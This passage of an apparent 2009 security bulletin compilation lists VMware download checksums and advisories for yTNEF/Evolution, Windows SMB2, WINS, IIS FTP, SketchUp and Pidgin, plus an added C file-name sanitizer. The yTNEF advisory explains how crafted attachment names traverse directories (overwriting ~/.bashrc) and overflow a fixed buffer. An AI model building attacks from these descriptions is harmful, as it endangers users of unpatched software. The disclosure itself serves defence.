sha1sum: 9f687afd8b0f39cde40aeceb3213a91be487aad1

For Linux

Workstation for Linux 32-bit
Linux 32-bit .rpm
md5sum: 4d55c491bd008ded0ea19f373d1d1fd4
sha1sum: 1f43131c960e76a530390d3b6984c78dfc2da23e

Workstation for Linux 32-bit
Linux 32-bit .bundle
md5sum: d4a721c1918c0e8a87c6fa4bad49ad35
sha1sum: c0c6f9b56e70bd3ffdb5467ee176110e283a69e5

Workstation for Linux 64-bit
Linux 64-bit .rpm
md5sum: 72adfdb03de4959f044fcb983412ae7c
sha1sum: ba16163c8d9b5aa572526b34a7b63dc6e68f9bbb

Workstation for Linux 64-bit
Linux 64-bit .bundle
md5sum: 83e1f0c94d6974286256c4d3b559e854
sha1sum: 8763f250a3ac5fc4698bd26319b93fecb498d542

VMware Player 2.5.3

http://www.vmware.com/download/player/
Release notes:
http://www.vmware.com/support/player25/doc/releasenotes_player253.html

Player for Windows binary

http://download3.vmware.com/software/vmplayer/VMware-player-2.5.3-185404.exe
md5sum: fe28f193374c9457752ee16cd6cad4e7
sha1sum: 13bd3ff93c04fa272544d3ef6de5ae746708af04

Player for Linux (.rpm)


http://download3.vmware.com/software/vmplayer/VMware-Player-2.5.3-185404.i386.rpm

md5sum: c99cd65f19fdfc7651bcb7f328b73bc2
sha1sum: a33231b26e2358a72d16e1b4e2656a5873fe637e

Player for Linux (.bundle)

http://download3.vmware.com/software/vmplayer/VMware-Player-2.5.3-185404.i386.bundle
md5sum: 210f4cb5615bd3b2171bc054b9b2bac5
sha1sum: 2f6497890b17b37480165bab9f430e8645edae9b

Player for Linux – 64-bit (.rpm)

http://download3.vmware.com/software/vmplayer/VMware-Player-2.5.3-185404.x86_64.rpm
md5sum: f91576ef90b322d83225117ae9335968
sha1sum: f492fa9cf26ee2818f164aac04cde1680c25d974

Player for Linux – 64-bit (.bundle)

http://download3.vmware.com/software/vmplayer/VMware-Player-2.5.3-185404.x86_64.bundle
md5sum: 595d44d7945c129b1aeb679d2f001b05
sha1sum: acd69fcb0c6bc49fd4af748c65c7fb730ab1e8c4

VMware ACE 2.5.3

http://www.vmware.com/download/ace/
Release notes:
http://www.vmware.com/support/ace25/doc/releasenotes_ace253.html

ACE Management Server Virtual Appliance
AMS Virtual Appliance .zip
md5sum: 44cc7b86353047f02cf6ea0653e38418
sha1sum: 9f44b15e6681a6e58dd20784f829c68091a62cd1

VMware ACE for Windows 32-bit and 64-bit
Windows 32-bit and 64-bit .exe
md5sum: 0779da73408c5e649e0fd1c62d23820f
sha1sum: 2b2e4963adc89f3b642874685f490222523b63ef

ACE Management Server for Windows
Windows .exe
md5sum: 0779da73408c5e649e0fd1c62d23820f
sha1sum: 2b2e4963adc89f3b642874685f490222523b63ef

ACE Management Server for SUSE Enterprise Linux 9
SLES 9 .rpm
md5sum: a4fc92d7197f0d569361cdf4b8cca642
sha1sum: af8a135cca398cacaa82c8c3c325011c6cd3ed75

ACE Management Server for Red Hat Enterprise Linux 4
RHEL 4 .rpm
md5sum: 841005151338c8b954f08d035815fd58
sha1sum: 67e48624dba20e6be9e41ec9a5aba407dd8cc01e

CVE Information:
CVE-2009-0199
CVE-2009-2628


yTNEF/Evolution TNEF Attachment Decoder Plugin Multiple Vulnerabilities

Transport Neutral Encapsulation Format (TNEF) is a proprietary e-mail attachment format used by Microsoft Outlook and Microsoft Exchange Server. A plugin for Evolution exists that provides basic support for TNEF encoded e-mails. This plugin uses the ytnef library (libytnef) for processing TNEF messages. It borrows code from the ytnef program, which is a program to work with procmail to decode TNEF streams (winmail.dat attachments). These applications share code and are, because of this, both affected by the issues described in this document.

yTNEF & the Evolution TNEF Attachment decoder plugin are affected by several directory traversal and buffer overflow vulnerabilities. The directory traversal vulnerabilities allow attackers to overwrite or create local files with the privileges of the target user. Exploiting the buffer overflow vulnerabilities allows for arbitrary code execution with the privileges of the target user.

Credit:
The information has been provided by Yorick Koster.
The original article can be found at: http://www.akitasecurity.nl/advisory.php?id=AK20090601

Vulnerable Systems:
* Evolution TNEF version 2.62.2
* yTNEF version 2.6

The following functions are affected by these issues:

Evolution plugin:
* processTnef()
* saveVCard()
* saveVCalendar()
* saveVTask()

yTNEF:
* ProcessTNEF()
* SaveVCard()
* SaveVCalendar()
* SaveVTask()

Evolution TNEF Attachment decoder plugin

The plugin is started on e-mail attachments that have a MIME type of either application/vnd.ms-tnef or application/ms-tnef. It creates a temporary directory under ~/.evolution/cache/tmp using the format tnef-attachment-XXXXXX. The TNEF attachment is saved as .evo-attachment.tnef.

The saved file is parsed by TNEFParseFile(); the result is stored in a struct of the type TNEFStruct. This struct is passed to the function processTnef(), which tries to extract all relevant data and attachments from the TNEF stream. Each relevant part of the TNEF stream is stored within the previously created temporary directory and made available to the end user as a separate e-mail attachment.

yTNEF

yTNEF processes TNEF files in a similar manner. It receives a file name from the command line, calls TNEFParseFile() that creates a struct TNEFStruct after which ProcessTNEF() is called. If ProcessTNEF() finds attachments it can process, these attachments will be saved locally. The ProcessTNEF() function is almost the same as the processTnef() function of the Evolution plugin.

Directory Traversal

If a TNEF file is processed, both yTNEF and the Evolution plugin will save certain types of TNEF structures. Special processing functions are available for Contacts, Tasks & Appointments. These functions are called if the Message Class is set to a certain value.

There is also code that treats TNEF structures with the Message Class set to IPM.Microsoft Mail.Note. In the Evolution plugin, this code is never called as the global variable saveRTF is set to zero. In case of yTNEF this global variable is controlled by the command line.

After the structures mentioned before have been processed, all other attachments are also saved locally. The file names used to save the attachments are obtained from the TNEF data. In the case of normal attachments, the code first checks whether the TNEF data contains MAPI properties and, if so, looks for specific properties. If these exist, a file name is extracted from them. If the properties do not exist, the attachment’s title is used. This title is also set through a TNEF structure. If this title is also not available, a default file name is used instead.

Before a new file is created, all spaces within the file name are replaced with the underscore character. No additional sanitization is performed on the file name. Because of this, it is possible to traverse outside of the temporary directory and create or overwrite any file with the privileges of the target user. This allows an attacker to execute arbitrary code, for example by overwriting ~/.bashrc.

Buffer Overflow

Besides the directory traversal, it is also possible to trigger a buffer overflow by supplying an overly long file name. This is possible because the file name is copied into a fixed-size buffer (256 bytes). In the Evolution plugin, this triggers a buffer overflow on the heap. In the case of yTNEF, the file name is copied into a buffer on the stack, thus allowing a stack-based buffer overflow to occur.
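The two missing checks described above (no path sanitization beyond replacing spaces, and an unchecked copy into a 256-byte buffer) can be closed in one place. The following is an added example, not code from yTNEF or the Evolution plugin; the function names `sanitize_attachment_name` and `build_attachment_path` are hypothetical, and the inputs in `main` are constructed.

```c
#include <stdio.h>
#include <string.h>

#define NAME_BUF 256   /* same size as the fixed buffer described above */

/* Reduce an untrusted TNEF-supplied name to one safe path component.
 * Returns 0 on success, -1 if the name is empty, "." / "..", or too long. */
int sanitize_attachment_name(const char *untrusted, char *out, size_t outlen)
{
    const char *base = untrusted;
    size_t i, len;

    if (untrusted == NULL || out == NULL || outlen == 0)
        return -1;
    /* Keep only what follows the last '/' or '\\', so "../" sequences and
     * absolute paths cannot steer the write out of the temp directory. */
    for (const char *p = untrusted; *p != '\0'; p++)
        if (*p == '/' || *p == '\\')
            base = p + 1;
    len = strlen(base);
    /* Reject over-long names instead of copying or silently truncating. */
    if (len == 0 || len >= outlen || !strcmp(base, ".") || !strcmp(base, ".."))
        return -1;
    for (i = 0; i < len; i++) {
        unsigned char c = (unsigned char)base[i];
        /* Spaces become '_' as before; control bytes are neutralised too. */
        out[i] = (c == ' ' || c < 0x20 || c == 0x7f) ? '_' : (char)c;
    }
    out[len] = '\0';
    return 0;
}

/* Join the temp directory and the sanitized name with a bounds check.
 * Returns 0 on success, -1 on rejection or if the result would not fit. */
int build_attachment_path(const char *tmpdir, const char *untrusted,
                          char *out, size_t outlen)
{
    char name[NAME_BUF];
    int n;
    if (tmpdir == NULL || out == NULL || outlen == 0)
        return -1;
    if (sanitize_attachment_name(untrusted, name, sizeof name) != 0)
        return -1;
    n = snprintf(out, outlen, "%s/%s", tmpdir, name);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

int main(void)
{
    char path[512];   /* inputs below are constructed for illustration */
    if (build_attachment_path("tnef-attachment-XXXXXX", "../my notes.txt",
                              path, sizeof path) == 0)
        puts(path);
    return 0;
}
```

A caller should treat a -1 return as a reason to fall back to the default file name rather than to retry with a shortened copy of the untrusted name.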


Microsoft Windows SMB2 ‘SRV2.SYS’ Denial of Service Vulnerability

Remote: Yes
Local: No
Published: Sep 07 2009 12:00AM
Updated: Sep 08 2009 02:11PM
Credit: Laurent Gaffié
Vulnerable: Microsoft Windows Vista x64 Edition SP2
Microsoft Windows Vista x64 Edition SP1
Microsoft Windows Vista x64 Edition 0
Microsoft Windows Vista Ultimate 64-bit edition SP2
Microsoft Windows Vista Ultimate 64-bit edition SP1
Microsoft Windows Vista Ultimate 64-bit edition 0
Microsoft Windows Vista Home Premium 64-bit edition SP2
Microsoft Windows Vista Home Premium 64-bit edition SP1
Microsoft Windows Vista Home Premium 64-bit edition 0
Microsoft Windows Vista Home Basic 64-bit edition SP2
Microsoft Windows Vista Home Basic 64-bit edition SP1
Microsoft Windows Vista Home Basic 64-bit edition 0
Microsoft Windows Vista Enterprise 64-bit edition SP2
Microsoft Windows Vista Enterprise 64-bit edition SP1
Microsoft Windows Vista Enterprise 64-bit edition 0
Microsoft Windows Vista Business 64-bit edition SP2
Microsoft Windows Vista Business 64-bit edition SP1
Microsoft Windows Vista Business 64-bit edition 0
Microsoft Windows Vista Ultimate SP2
Microsoft Windows Vista Ultimate SP1
Microsoft Windows Vista Ultimate
Microsoft Windows Vista Home Premium SP2
Microsoft Windows Vista Home Premium SP1
Microsoft Windows Vista Home Premium
Microsoft Windows Vista Home Basic SP2
Microsoft Windows Vista Home Basic SP1
Microsoft Windows Vista Home Basic
Microsoft Windows Vista Enterprise SP2
Microsoft Windows Vista Enterprise SP1
Microsoft Windows Vista Enterprise
Microsoft Windows Vista Business SP2
Microsoft Windows Vista Business SP1
Microsoft Windows Vista Business
Microsoft Windows 7 for x64-based Systems 0
Microsoft Windows 7 for Itanium-based Systems 0
Microsoft Windows 7 for 32-bit Systems 0
Microsoft Windows 7 beta

Facebook Fan Check Virus scare leads to malware

Beware of Googling (or indeed Yahooing or Binging or using any other internet search engine) for information about something called “Facebook Fan Check Virus”, as you’re likely to end up on a website hosting malicious code.

The phrase “Facebook Fan Check Virus” is currently a hot trending topic on Google, with many net users searching for information.

However, hackers have set up websites pretending to be about the “Facebook Fan Check Virus”, but which really host fake anti-virus software that displays bogus warnings about the security of your computer in an attempt to get you to install fraudulent software and cough up your credit card details.


Microsoft Windows WINS Server Network Buffer Length Integer Overflow Vulnerability

CVE: CVE-2009-1924
Remote: Yes
Local: No
Published: Aug 11 2009 12:00AM
Updated: Sep 07 2009 03:41PM
Credit: LiGen of National University of Defense Technology
Vulnerable: Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Professional SP4
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Advanced Server SP4

Google SketchUp ‘.skp’ File Remote Buffer Overflow Vulnerability

Remote: Yes
Local: No
Published: Aug 01 2009 12:00AM
Updated: Sep 07 2009 03:21PM
Credit: LiquidWorm
Vulnerable: Google Sketchup 7.0.10247

Google SketchUp is prone to a remote buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied input.

Attackers may exploit this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.

Google SketchUp 7.0.10247 is vulnerable; other versions may also be affected.

Solution:
Currently we are not aware of any vendor-supplied patches.


Pidgin Libpurple Multiple Denial of Service Vulnerabilities

CVE: CVE-2009-2703
Remote: Yes
Local: No
Published: Sep 03 2009 12:00AM
Updated: Sep 07 2009 09:01AM
Credit: Florob, Waqas, Paul Aurich, Marcus Lundblad, aly89, Elliott Sales de Andrade, and blackstar. Cristofaro Mune discovered CVE-2009-2703.
Vulnerable: Pidgin Libpurple 2.6.1
Pidgin Libpurple 2.6
Pidgin Libpurple 2.5.2

Pidgin Libpurple is prone to multiple denial-of-service vulnerabilities.

Successful exploits will crash the application, denying service to legitimate users.

Pidgin Libpurple versions 2.6.1 and prior are affected.


Microsoft IIS FTPd NLST Remote Buffer Overflow Vulnerability

CVE: CVE-2009-3023
Remote: Yes
Local: No
Published: Aug 31 2009 12:00AM
Updated: Sep 07 2009 08:51AM
Credit: Kingcope
Vulnerable: Microsoft IIS 6.0
+ Microsoft Windows Server 2003 Datacenter Edition
+ Microsoft Windows Server 2003 Datacenter Edition
+ Microsoft Windows Server 2003 Datacenter Edition Itanium 0
+ Microsoft Windows Server 2003 Datacenter Edition Itanium 0
+ Microsoft Windows Server 2003 Enterprise Edition
+ Microsoft Windows Server 2003 Enterprise Edition
+ Microsoft Windows Server 2003 Enterprise Edition Itanium 0
+ Microsoft Windows Server 2003 Enterprise Edition Itanium 0
+ Microsoft Windows Server 2003 Standard Edition
+ Microsoft Windows Server 2003 Standard Edition
+ Microsoft Windows Server 2003 Web Edition
+ Microsoft Windows Server 2003 Web Edition
Microsoft IIS 5.1
– Microsoft Windows 2000 Advanced Server SP2
– Microsoft Windows 2000 Advanced Server SP1
– Microsoft Windows 2000 Advanced Server
– Microsoft Windows 2000 Datacenter Server SP2
– Microsoft Windows 2000 Datacenter Server SP1
– Microsoft Windows 2000 Datacenter Server
– Microsoft Windows 2000 Professional SP2
– Microsoft Windows 2000 Professional SP1
– Microsoft Windows 2000 Professional
– Microsoft Windows 2000 Server SP2
– Microsoft Windows 2000 Server SP1
– Microsoft Windows 2000 Server
+ Microsoft Windows XP 64-bit Edition SP1
+ Microsoft Windows XP 64-bit Edition
+ Microsoft Windows XP 64-bit Edition
– Microsoft Windows XP Home SP1
– Microsoft Windows XP Home SP1
– Microsoft Windows XP Home
– Microsoft Windows XP Home
+ Microsoft Windows XP Professional SP1
+ Microsoft Windows XP Professional SP1
+ Microsoft Windows XP Professional
+ Microsoft Windows XP Professional
Microsoft IIS 5.0
– Microsoft Windows 2000 Advanced Server SP2
– Microsoft Windows 2000 Advanced Server SP2
– Microsoft Windows 2000 Advanced Server SP1
– Microsoft Windows 2000 Advanced Server SP1
+ Microsoft Windows 2000 Advanced Server
+ Microsoft Windows 2000 Advanced Server
– Microsoft Windows 2000 Datacenter Server SP2
– Microsoft Windows 2000 Datacenter Server SP2
– Microsoft Windows 2000 Datacenter Server SP1
– Microsoft Windows 2000 Datacenter Server SP1
– Microsoft Windows 2000 Professional SP2
– Microsoft Windows 2000 Professional SP2
– Microsoft Windows 2000 Professional SP1
– Microsoft Windows 2000 Professional SP1
+ Microsoft Windows 2000 Professional
+ Microsoft Windows 2000 Professional
– Microsoft Windows 2000 Server SP2
– Microsoft Windows 2000 Server SP2
– Microsoft Windows 2000 Server SP1
– Microsoft Windows 2000 Server SP1
+ Microsoft Windows 2000 Server
+ Microsoft Windows 2000 Server
Not Vulnerable: Microsoft IIS 7.5

Microsoft IIS is prone to a remote stack-based buffer-overflow vulnerability affecting the application’s FTP server.

An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.

This issue affects the following:

IIS 5.0
IIS 5.1
IIS 6.0 (denial of service only)
IIS 7.0 (denial of service only)

Please note that Microsoft IIS 7.0 with FTP Service 7.5 is not affected.

Other versions may also be affected.

NOTE: This issue cannot be exploited to execute arbitrary code on IIS 6.0 or 7.0.

NOTE (September 1, 2009): This issue can be exploited to execute arbitrary code with SYSTEM-level privileges on IIS 5.0.
